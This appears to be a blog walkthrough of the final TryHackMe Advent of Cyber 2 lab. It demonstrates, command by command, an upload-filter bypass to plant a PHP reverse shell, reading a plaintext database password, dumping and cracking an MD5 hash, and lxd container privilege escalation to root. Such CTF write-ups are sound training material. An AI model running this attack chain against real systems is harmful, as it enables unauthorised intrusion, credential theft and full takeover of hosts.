On our final day it seems that Santa has given us a present! I love early Christmas gifts. We have been given a computer and we need to hack our way in! How fun!
As always let’s start off by scanning the machine with Nmap.
nmap -p- -sV -T4 –reason 10.10.143.180
Looks like we have port 80 and 65000 open. These 2 ports are the answer to the first question. Seeing they are both running Apache, they are most likely HTTP servers. We can visit both pages through our web browser. One presents us with a fake TryHackMe page and the other presents us with a login page!
Port 80
Port 65000
This allows us to answer the next question what’s the title of the hidden webpage.
Now apparently there is a hidden php page. We can use a tool called GoBuster to determine this page. Kali has built in wordlists, so I am going to take advantage of those. GoBuster takes a url and a wordlist, then tries to visit the URL with each word in the wordlist.
So if your wordlist file contained hack, hacker, hacked and the URL was ljklfjdks.com, the tool would try
ljklfjdks.com/hack
ljklfjdks.com/hacker
ljklfjdks.com/hacked
If you don’t have GoBuster run sudo apt-get install gobuster.
We will want to use the dir mode for DirBuster to brute force directories. We can use the -x option to add our php extension. Then we need to give it the URL with the -u flag and finally a wordlist with the -w flag.
gobuster dir -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u http://10.10.143.180
Remember there is another web server on port 65000, so we need to run the tool there too.
gobuster dir -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u http://10.10.143.180:65000
We get some quick results. It asks us about a hidden php page, and when you enter uploads.php that’s the correct hidden page. Then we can assume that grid is where the uploads are saved. Visiting grid it looks like a place where files would be saved.
The uploads page looks like this:
Well now we think we can upload files, and maybe we can execute those files through the grid page. Let’s make a php reveres shell and try to upload it. PentestMonkey has an easy to use shell. You just need to replace 2 lines, set up your listener and you are done. The goal is to execute the php code and it call make a call back to your attacker machine. Save the contents from the link below into Hacking.php. The file name at this point doesn’t matter.
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
You can just run the following from a terminal to download the file.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
I’m going to make a copy of this called Hacking.php for fun.
cp php-reverse-shell.php Hacking.php
Now we need to tell the code where our reverse shell will be. Put in your tun0 IP, if that’s the TryHackMe VPN, and then a port, I’m going to use 1337. The code even has comments and tells us where to change it!
Let’s set up a netcat listener to receive the shell once our php script executes.
nc -nlvp 1337
-n numeric only IPs (No hostnames)
-l listen for inbound connection
-v verbose mode (get more detail about the connection)
-p port to listen on
Now let’s visit the uploads page at http://10.10.143.180:65000/uploads.php, and upload our reverse shell.
Looks like the security team knows they don’t want PHP files uploaded so it gets blocked. Let’s open up Burp Suite so we can view the web requests.
Running the request through burp doesn’t seem to help. The clues talked about taking out the interception rule for ^js$ so let’s try removing that. Click on the proxy tab, select options, then click edit under Intercept Client Requests. Finally remove the Match Condition that says |^js$. This is regex for match anything that starts with js and also ends with js. Since this is a file extension match in burp, it’s looking for anything that ends in js.
Now let’s reload the page and watch the requests. The first one is for /uploads.php so that’s the main page, let it through. Some other requests come through, but then there’s a /assets/js/filter.js. Maybe if we just drop that then we can upload our normal php shell!
Since php files still get blocked let’s try to make a double extension file by running
cp hacking.php hacking.jpeg.php
Pictures are normally allowed to be uploaded, so maybe we can trick the server to allow our php code to be uploaded by having the .jpeg extension on the file.
If we upload our file titled hacking.jpeg.php we get a file uploaded successfully!
Now visit http://10.10.143.180:65000/grid
Note: replace the IP address with your target. We can see that our file was uploaded successfully.
Once you click on the file, check your terminal for a reverse shell!
Let’s upgrade our shelling using python, and export command, and the stty raw command. In your shell run the following:
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm
Hit Ctrl + Z
stty raw -echo; fg
If your shell doesn’t appear, hit enter and you should see it.
We are asked for the value of web.txt, so let’s search for that file.
find / -iname “web.txt” 2>/dev/null
Here we are searching through the file system, starting with root (/) and trying to find web.txt. The 2>/dev/null sends all errors to /dev/null so we don’t see them. Otherwise we would see a lot of permission errors, because we aren’t a privileged user.
cat /var/www/web.txt to get the flag.
If at any time you have issues with your terminal, just open another one, run nc -nlvp 1337, and then open your Hacking.jpeg.php file located at http://10.10.143.180:65000/grid
When looking through the various files on the webserver we discover /var/www/TheGrid/includes/dbauth.php
cd /var/www/TheGrid/includes
cat dbauth.php
Looks like we have a database password! Also the answer to another question.
Now let’s try to interact with the database on this machine running the following command
mysql -u tron -p
When prompted enter the password of IFightForTheUsers.
Great we have connected to the database. Let’s list the databases using the command show databases; This tells us there is a database called tron, so let’s use the database and list the tables in tron using the command show tables;
The users table seems interesting. We can list the columns, using a SQL command.
SELECT * FROM users;
Here we are selecting everything from the users table.
Looks like we have a user and a hashed password, answer the question about what database you found this in, which is tron.
Let’s see if we can crack the password. First let’s find out what kind of hash this is. There’s a great tool called hash-identifier, written in python. (https://github.com/blackploit/hash-identifier) Download this and then run python3 hash-id.py edc621628f6d19a13a00fd683f5e3ff7. The tool is also now built into Kali.
Looks like it thinks it’s an MD5 hash. Let’s use hashcat to crack the password. This tool will either take a wordlist or attempt to brute force the password depending on the options given. The tool works the fastest on GPU’s, but if you run it in a virtual machine it still works, just ends up being slower. Let’s put the hash in a file and then attempt to crack it.
echo edc621628f6d19a13a00fd683f5e3ff7 > hash
We can get a great wordlist called rockyou from https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.txt.gz
Since this is a .gz file extension we need to extract it:
gzip -d rockyou.txt.gz
Now that we have the wordlist let’s use hashcat to crack it. Hashcat has multiple modes depending on the hash type and attack you want to run. This can be used to try every combination for a password, use a wordlist, create rules and mutate wordlists and much more. For this attack let’s just use a wordlist.
hashcat -a0 -m0 hash /usr/share/wordlists/rockyou.txt
-a0 attack mode straight
-m0 defines the has type of MD5, which we got from hash-identifier
hash the file that contains the hash
Finally the wordlist we want to use
The program gets to work attempting to crack the password. Pretty soon we have a cracked password of @computer@
It took my virtual machine less than 1 minute to crack this password. MD5 is a super insecure algorithm and passwords should not be stored like this, but a lot of times they are.
Hit ctrl + z in the terminal you have mysql up on the target host. Now let’s switch to the flynn user using the command su flynn. Then type the password @comptuer@. We can answer another question.
Now we can get the user flag by moving into the /home/flynn directory and running cat against user.txt
cd /home/flynn
cat user.txt
Let’s check the groups we are in to see if we can privilege escalate by running groups.
Great let’s abuse lxd to gain root privileges. LXC stands for Linux Containers, which is used for operating-system-level virtualization.
Let’s list the image list by running
lxc image list
Now that we see Alpine image is there , but let’s create our own Image and Container from the template
lxc init Alpine Hacking -c security.privileged=true
lxc config device add Hacking Pwned disk source=/ path=/mnt/root recursive=true
lxc start Hacking
Now start a shell within the container to gain root!
lxc exec Hacking /bin/sh
Now since this container is mounted we need to cd into our /mnt directory. You can find the flag at /mnt/root/root/root.txt
cat /mnt/root/root/root.txt
Woohoo we have made it through all of our tasks for the Advent of Cyber 2. I hope you learned a lot I know I did. Thanks for checking out the blog!